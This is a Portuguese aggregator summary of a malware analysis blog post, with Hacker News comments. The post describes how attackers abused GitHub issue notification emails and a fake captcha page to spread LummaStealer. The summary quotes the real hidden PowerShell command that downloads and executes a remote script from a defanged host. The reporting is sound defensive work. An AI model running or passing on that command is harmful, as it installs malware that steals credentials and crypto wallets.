Incidente de distribuição de malware explorando e-mails de notificação do GitHub

 (ianspence.com)
1 pontos por GN⁺ 2024-09-20 | 1 comentários | Compartilhar no WhatsApp
  • Como desenvolvedor de código aberto, é comum receber e-mails do GitHub
  • A maioria desses e-mails são notificações informando interações feitas por usuários no GitHub
  • Porém, alguns e-mails levam ao download de malware ao se passarem pela segurança do GitHub

Método do ataque

  1. O invasor usa uma conta temporária do GitHub para criar uma issue em um repositório público
  2. O invasor apaga rapidamente a issue
  3. O dono do repositório recebe um e-mail de notificação
  4. Clica no link do e-mail
  5. Segue as instruções e infecta o sistema com malware

Análise da mensagem de e-mail

  • O conteúdo do e-mail é em grande parte controlável pelo invasor
  • O e-mail não informa que uma nova issue foi criada
  • O invasor se passa pela "Github Security Team"
  • Como o e-mail é enviado pelo próprio GitHub, ele passa nas verificações de phishing

Pontos de melhoria no GitHub

  • Fornecer mais contexto no e-mail pode reduzir a eficácia do ataque
  • É preciso reduzir o conteúdo controlável pelo invasor e deixar mais claro quem é o remetente

Website

  • Ao seguir o link do e-mail, a vítima é levada a uma página de captcha
  • A página de captcha induz o usuário a digitar um comando na caixa Executar do Windows

Malware

  • O site copia o seguinte comando para a área de transferência: 
    powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content"
  • Esse comando inicia um processo do PowerShell, baixa um script e o executa

Etapas do malware

  1. Baixa e executa um script por meio de um comando PowerShell
  2. O script baixa e executa um arquivo executável malicioso
  3. O executável tem assinatura digital, mas ela não é válida
  4. O Windows não emite alerta para assinaturas inválidas

Fraquezas do Windows

  • A flag "Mark of the Web" (MOTW), que identifica arquivos baixados da internet, não é definida
  • A classe System.Net.WebClient do .NET Framework não define a flag MOTW
  • Quando a flag MOTW não está definida, o Windows não alerta sobre assinaturas inválidas

Análise do malware

  • O malware é carregado e executado na memória
  • Trata-se do malware chamado LummaStealer, que rouba carteiras de criptomoedas, credenciais salvas e outros dados

Conclusão

  • Caso de ataque que explora fragilidades nos e-mails de notificação do GitHub
  • A análise foi realizada com o uso de diversas ferramentas

Resumo do GN⁺

  • Este artigo aborda um caso de ataque de malware que explorou e-mails de notificação do GitHub
  • O malware foi distribuído explorando fragilidades no sistema de e-mail do GitHub
  • Também foram exploradas fraquezas na flag "Mark of the Web" do Windows e na validação de assinaturas digitais
  • Foi usado o malware chamado LummaStealer
  • As fragilidades foram reportadas ao GitHub e à Microsoft
  • Como projeto semelhante com funcionalidade parecida, recomenda-se o material de análise da Cyfirma

Leituras relacionadas

1 comentários

 
GN⁺ 2024-09-20
Comentários no Hacker News

  • Recentemente recebi um e-mail muito convincente do PayPal

    • Alguém usou o recurso de citação para definir o nome da empresa como "PayPal need to get in touch about a your recent payment of $499.00, please call +1-...."
    • O e-mail veio realmente de PayPal.com, e não faz sentido que eles não controlem esse tipo de nome de usuário
    • Eu relatei isso, mas ainda não recebi resposta
    • Esse e-mail foi formatado para parecer um e-mail verdadeiro do PayPal, então muita gente provavelmente cairia nisso

  • Fico me perguntando se as pessoas realmente caem nesse tipo de golpe

    • Supondo que você saiba que o e-mail veio do github
    • Primeiro alerta: o e-mail leva a uma variação do domínio real
    • Segundo alerta: o captcha pede para você digitar um comando de shell

  • Acho que desenvolvedores júnior podem cair nesse tipo de golpe

    • "Ah, que interessante, resolver um captcha executando código!"

  • Uma página web não deveria conseguir preencher a área de transferência só com um clique

    • Você não deveria clicar em links de e-mails nem confiar no conteúdo do e-mail
    • O problema é que o Windows ainda permite privilégio de root com um comando PowerShell de uma linha

  • O Github deveria impedir que serviços automatizados coloquem links em issues sem verificar esses links

    • O Github deveria controlar melhor o conteúdo que envia por e-mail

  • Fico me perguntando se github-scanner.com ainda é uma parte maliciosa

    • A Cloudflare está hospedando o DNS, e não há uma forma de reportar esse problema

  • O atacante apagou a issue rapidamente

    • Só administradores podem apagar issues
    • Portanto, um rastro da issue permanece no repositório

  • Bom texto, passa uma sensação parecida com o blog da Julia Evans

  • É triste que, mesmo em 2024, ainda existam pessoas que caem nos golpes mais simples

  • Recebi uma notificação dessas hoje de manhã e ignorei

    • A notificação era sobre um repositório específico

  • Vale a leitura, mostra o que eles estavam tentando fazer

    • Só o link já pode parecer suspeito, mas é interessante ver alguém investigando isso a fundo

  • Recebi um e-mail de notificação do GitHub parecido

    • Dizia que uma vulnerabilidade tinha sido encontrada no repositório, mas não cliquei
    • Não cliquei por ser um programador preguiçoso